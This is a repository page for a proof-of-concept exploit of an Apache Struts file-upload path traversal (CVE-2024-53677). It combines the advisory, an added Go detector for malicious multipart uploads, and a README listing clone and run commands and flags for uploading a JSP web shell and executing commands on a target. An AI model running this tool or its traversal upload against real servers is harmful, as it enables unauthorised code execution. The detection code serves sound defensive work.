
CVE-2024-53677 PoC — Apache Struts: Mixing setters for uploaded files and normal fields can allow bypass file upload checks

Associated Vulnerability
Title: Apache Struts: Mixing setters for uploaded files and normal fields can allow bypass file upload checks (CVE-2024-53677)
Description: File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable path traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe. You can find more details in https://cwiki.apache.org/confluence/display/WW/S2-067
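The advisory above describes the request shape that matters for detection: a multipart upload in which a plain text field (the page's example parameter is `top.UploadFileName`) is sent next to the real file part, and its value carries a path traversal sequence so the file lands outside the upload directory. The following Go program is an added example, not code from the PoC repository or from Apache Struts; it parses a multipart body with the standard library and flags both signals, which is what you would run over captured requests or in a pre-filter while the upgrade to 6.4.0 and the migration to the new upload mechanism are carried out. The function names `InspectUpload`, `hasTraversal` and `sampleRequest`, the boundary string and the sample bodies are all constructed for this example; it goes slightly beyond the page by also checking the uploaded part's own filename and by accepting either path separator.

```go
package main

import (
	"bytes"
	"fmt"
	"mime"
	"mime/multipart"
	"strings"
)

// Finding is one suspicious property of a multipart upload request.
type Finding struct {
	Field  string // multipart field name
	Value  string // offending value
	Reason string
}

// hasTraversal reports whether a path-like value contains a ".." segment,
// with either separator; this is what a file-name override needs in order to
// escape the upload directory.
func hasTraversal(s string) bool {
	segs := strings.FieldsFunc(s, func(r rune) bool { return r == '/' || r == '\\' })
	for _, seg := range segs {
		if seg == ".." {
			return true
		}
	}
	return false
}

// InspectUpload parses a multipart/form-data body and flags the two things
// that characterise abuse of the old Struts FileUploadInterceptor: a text
// field whose name ends in "FileName" (the page's example is
// top.UploadFileName) arriving alongside a real file part, and any file name,
// from such a field or from the part itself, that traverses upwards.
func InspectUpload(contentType string, body []byte) ([]Finding, error) {
	_, params, err := mime.ParseMediaType(contentType)
	if err != nil {
		return nil, fmt.Errorf("parse content-type: %w", err)
	}
	boundary, ok := params["boundary"]
	if !ok {
		return nil, fmt.Errorf("multipart body without boundary")
	}
	form, err := multipart.NewReader(bytes.NewReader(body), boundary).ReadForm(10 << 20)
	if err != nil {
		return nil, fmt.Errorf("parse multipart: %w", err)
	}
	defer form.RemoveAll()

	var out []Finding
	hasFile := len(form.File) > 0

	for name, values := range form.Value {
		nameIsFileName := strings.HasSuffix(strings.ToLower(name), "filename")
		for _, v := range values {
			if nameIsFileName && hasFile {
				out = append(out, Finding{Field: name, Value: v,
					Reason: "text field overrides the file name of an upload part"})
			}
			if nameIsFileName && hasTraversal(v) {
				out = append(out, Finding{Field: name, Value: v,
					Reason: "file name contains a path traversal segment"})
			}
		}
	}
	for name, headers := range form.File {
		for _, h := range headers {
			if hasTraversal(h.Filename) {
				out = append(out, Finding{Field: name, Value: h.Filename,
					Reason: "uploaded part's filename contains a path traversal segment"})
			}
		}
	}
	return out, nil
}

// sampleRequest builds a constructed multipart body of the shape the page
// describes (a file part named Upload plus one extra text field) and returns
// the Content-Type header value together with the body bytes.
func sampleRequest(extraField, extraValue string) (string, []byte) {
	var buf bytes.Buffer
	w := multipart.NewWriter(&buf)
	_ = w.SetBoundary("constructed-boundary-0001") // fixed so output is deterministic
	fw, _ := w.CreateFormFile("Upload", "image.gif")
	_, _ = fw.Write([]byte("GIF89a;")) // constructed GIF header, not a real payload
	_ = w.WriteField(extraField, extraValue)
	_ = w.Close()
	return w.FormDataContentType(), buf.Bytes()
}

func main() {
	ct, body := sampleRequest("top.UploadFileName", "../../shell.jsp")
	findings, err := InspectUpload(ct, body)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s=%q: %s\n", f.Field, f.Value, f.Reason)
	}
}
```

The suffix match is deliberately case-insensitive because Struts resolves the setter through OGNL and the page's own example mixes cases; a benign request with the same file part and an unrelated text field produces no findings.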
Description
A proof of concept of CVE-2024-53677.
Readme
# CVE-2024-53677
A kind of old vulnerability that affects `Apache Struts`, leading to LFI and remote code execution.

## For more info about the vulnerability, refer to this great blog post.

[Apache Struts path traversal → RCE (CVE-2024-53677)](https://www.sonicwall.com/blog/apache-struts-path-traversal-to-rce-cve-2024-53677)

## POC usage
I have spent much time making this as customizable as possible because when I first encountered this CVE I did not find a good source that implemented it correctly.
Most of the flags have default values, so do not be discouraged by all of these flags.

```bash
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd  CVE-2024-53677-POC
go run . -h
```

```bash

  -command string
        command to execute on the server default: whoami
  -end-point string
        post endpoint default to: upload.action
  -file-location string
        where to save the file into the server default: what test function return
  -lfi-param string
        Parameter name for LFI testing default: top.UploadFileName
  -payload-file string
        Path to the payload file default: ./shell.jsp
  -payload-file-name string
        name of the payload it self default: shell.jsp
  -payload-param string
        Parameter name for payload injection default: Upload
  -test-file-name string
        name of the testfile it self default: testfile.txt
  -testing-file string
        File used for testing default: ./testfile.txt
  -url string
        Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
```
All of these flags have default values. I also implemented a testing function to check where the file should be put, and it is also a user-configurable option.

### Basic usage
```bash
go run .  -url http://127.0.0.1:8080/ -end-point upload.action
```


# NOTES.
A few things to note.
1. The default payload is in GIF format and the content type is gif; if it needs to be changed, this is the only option where you have to change the code.
2. The test function may produce a wrong assumption, so do not rely on it 100%.
3. You may need to run the exploit more than once, at least twice, because I noticed that when it first uploaded the payload it did not find it on the very next request.
So keep that in mind.

# Contributions.
Feel free to modify or add to the exploit ♥️.

# Resources.
- [Vulnerable docker image](https://github.com/cloudwafs/s2-067-CVE-2024-53677/tree/main)
- [More info about the exploit](https://www.sonicwall.com/blog/apache-struts-path-traversal-to-rce-cve-2024-53677)